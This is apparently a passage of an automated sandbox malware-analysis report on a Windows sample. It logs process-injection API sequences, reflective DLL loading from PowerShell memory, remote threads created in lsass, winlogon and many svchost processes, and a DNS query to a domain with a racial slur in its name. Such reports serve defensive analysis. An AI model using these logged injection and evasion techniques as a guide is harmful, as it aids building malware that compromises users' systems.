Source: C:\Windows\System32\svchost.exe | Code function: 30_2_000001CD7319CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,30_2_000001CD7319CD80
Source: C:\Windows\System32\svchost.exe | Code function: 30_2_000001CD731984B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,30_2_000001CD731984B0
Source: C:\Windows\$nya-onimai2\IfMUlU.exe | Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\System32\svchost.exe | Domain query: iam.nigga.dad
Source: 28.2.powershell.exe.253a5db0000.0.raw.unpack, DLLFromMemory.cs | Reference to suspicious API methods: Win.VirtualAlloc(PtrAdd(pCode, iMAGE_SECTION_HEADER.VirtualAddress), (UIntPtr)sectionAlignment, AllocationType.COMMIT, MemoryProtection.READWRITE)
Source: 28.2.powershell.exe.253a5db0000.0.raw.unpack, DLLFromMemory.cs | Reference to suspicious API methods: Win.LoadLibrary(PtrAdd(pCode, iMAGE_IMPORT_DESCRIPTOR.Name))
Source: 28.2.powershell.exe.253a5db0000.0.raw.unpack, DLLFromMemory.cs | Reference to suspicious API methods: Win.GetProcAddress(intPtr2, PtrAdd(PtrAdd(pCode, intPtr5), 2))
Source: 28.2.powershell.exe.253a5db0000.0.raw.unpack, DLLFromMemory.cs | Reference to suspicious API methods: Win.VirtualProtect(P_0, P_1, P_2, out P_3)
Source: C:\Windows\System32\dllhost.exe | Code function: 8_2_0000000140002434 CreateProcessW,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,VirtualProtectEx,VirtualAlloc,GetThreadContext,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,VirtualProtectEx,VirtualAlloc,Wow64GetThreadContext,WriteProcessMemory,Wow64SetThreadContext,OpenProcess,TerminateProcess,8_2_0000000140002434
Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\winlogon.exe EIP: DC612EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\lsass.exe EIP: C0AB2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 612D2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\dwm.exe EIP: AF192EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 87992EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 53772EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 5D532EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 67D2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 5B392EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\svchost.exe EIP: EBFD2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 59042EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\svchost.exe EIP: A9E72EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 73162EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 4E862EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 473C2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 6F9D2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 83BC2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\svchost.exe EIP: D3F72EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\svchost.exe EIP: A4152EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\svchost.exe EIP: BDF32EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\svchost.exe EIP: C0262EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\svchost.exe EIP: C9F32EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 645B2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 7B2A2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 4F62EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: DC612EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: C0AB2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 612D2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: AEDD2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 87992EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 53772EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 5D532EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 67D2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 5B392EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: EBFD2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 59042EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: A9E72EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 73162EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 4E862EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 473C2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 6F9D2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 83BC2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: D3F72EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: A4152EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: BDF32EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: C0262EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: C9F32EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 645B2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 7B2A2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 4F62EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 2AB72EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 4ADB2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\spoolsv.exe EIP: 1992EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 25DA2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: DC612EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: C0AB2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 612D2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: AEE32EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 87992EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 53772EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 5D532EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 67D2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 5B392EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: EBFD2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 59042EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: A9E72EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 73162EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 4E862EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 473C2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 6F9D2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\svchost.exe EIP: F5352EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 83BC2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: F0D62EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: FFB2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: C2572EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: D3F72EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 8B8D2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: A4152EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 66902EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 13EF2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: BDF32EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 8D572EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 69B42EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: CC742EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 5DA72EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: C0262EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 199D2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: C9F32EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: F3892EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 3B82EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 645B2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 40E42EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 7B2A2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: A6532EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 4F62EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 27BC2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 2AB72EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 7B152EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 621A2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 4ADB2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 2F482EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 8B4B2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\spoolsv.exe EIP: 1992EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 683D2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 3142EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 25DA2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 2E262EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\svchost.exe EIP: F5352EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 6C5E2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: D5932EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: F0D62EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: FC652EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: FFB2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 78742EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: C2572EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 33B42EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 8B8D2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 66902EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 8D0A2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 13EF2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: AB4C2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 8D572EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 2A642EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 69B42EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 6CF32EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: CC742EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 644F2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 5DA72EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 49352EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 199D2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: F3892EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 60DA2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 3B82EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 5E7B2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 40E42EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 2F7C2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: A6532EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: E8152EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 27BC2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 52342EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 7B152EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 9DA92EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 621A2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 2F482EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 8B4B2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 683D2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 3142EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 2E262EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 6C5E2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: D5932EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: FC652EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 78742EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 33B42EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 8D0A2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: AB4C2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 2A642EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 6CF32EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 644F2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 49352EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 60DA2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 5E7B2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 2F7C2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: E8152EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 52342EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 9DAC2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 602E2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: E77D2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: A4BC2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 5C652EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 3FB25AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 602E2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: A4E32EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: E77D2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: A4BC2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 7A022EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 5C652EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 72DC2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 3FB25AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: A2942EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: A4E32EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 7A022EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: A5ED2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 72DC2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 27B25AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: A2942EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 2EA25AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: A5ED2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 2E525AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 27B25AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 2EA25AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 9D25AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: B625AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 9D25AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 15825AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: B625AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 27025AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 15825AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 2F125AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 22225AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 23C25AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 2A125AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 2A725AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 23525AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 26F25AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 10B25AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 10D25AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 2F425AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 2F625AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: CE25AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: D025AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: BC25AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: BE25AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 2E525AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 2E725AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 2F425AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 2F625AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 11E25AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 12025AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 27E25AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 28025AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 6B25AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 6D25AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 29D25AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 29F25AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: FD25AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 2A625AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 25125AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 25325AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: B125AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 24D25AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 27925AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 27B25AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 29225AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 29425AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 2D825AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 2EA25AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 23D25AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 23F25AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: BE25AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: C125AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 25A25AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 25C25AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 2FB25AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 31425AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 21E25AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 22025AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 24025AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 24225AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 23E25AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 24025AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: FA25AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 2AE25AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 22225AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 22825AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: A525AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: A725AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 25A25AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 28425AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 2E525AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 2E725AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 21E25AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 22025AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 2A725AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 2CC25AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 27825AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 27A25AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 2E925AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 11125AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 2B225AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: BA25AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: BC25AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 21225AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 21B25AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 24925AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 26B25AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 29625AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 2A925AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 28325AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 28525AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 2A325AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 2A525AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 30025AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 30225AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 27725AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 27925AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: A725AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: A925AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 2E525AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 2E725AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 2BC25AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 2BE25AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 22F25AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 23125AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 25E25AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 26025AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 2DC25AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 2DE25AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 2C125AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 2D425AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 15325AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 15525AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 12225AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 2CF25AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 29325AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 29525AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 24B25AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 24D25AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 26F25AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 27125AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 27E25AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 28025AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: C525AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: CC25AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 29525AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 29725AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: C525AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: C725AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 2A025AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 2A225AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: A425AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 14925AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 2F625AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 8125AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 22E25AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 30425AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 30625AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 20525AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 20725AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 22425AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 22625AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 5D25AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 5F25AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: E325AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: E525AC
